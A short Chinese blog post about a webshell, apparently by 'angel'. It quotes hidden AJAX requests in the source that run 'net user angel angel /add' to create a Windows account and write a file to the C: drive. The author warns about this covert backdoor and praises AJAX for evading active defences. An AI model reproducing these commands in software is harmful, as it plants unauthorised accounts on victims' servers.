先看下angel忽悠我的部分源码
- makeRequest('<?=$self>','POST','action=shell&execfunc=system&command=net user angel angel /add');
- makeRequest('<?=$self>','POST','action=shell&execfunc=system&command=echo my_name_is_angel > c:\\angel.txt');
- </script>
太牛X了,还好我先看了下代码,呼呼。估计是跟黑锅学的,这Y的不学好。前几天测试的那个版本还有部分问题,这个版本,基本上是已经很完美了,在MYSQL管理方面是大大的强。
AJAX也比较强,今天才发现他在安全技术中的重要作用了。隐蔽性超级好。什么这主动那主动防御的,在AJAX面前就什么都不是了。
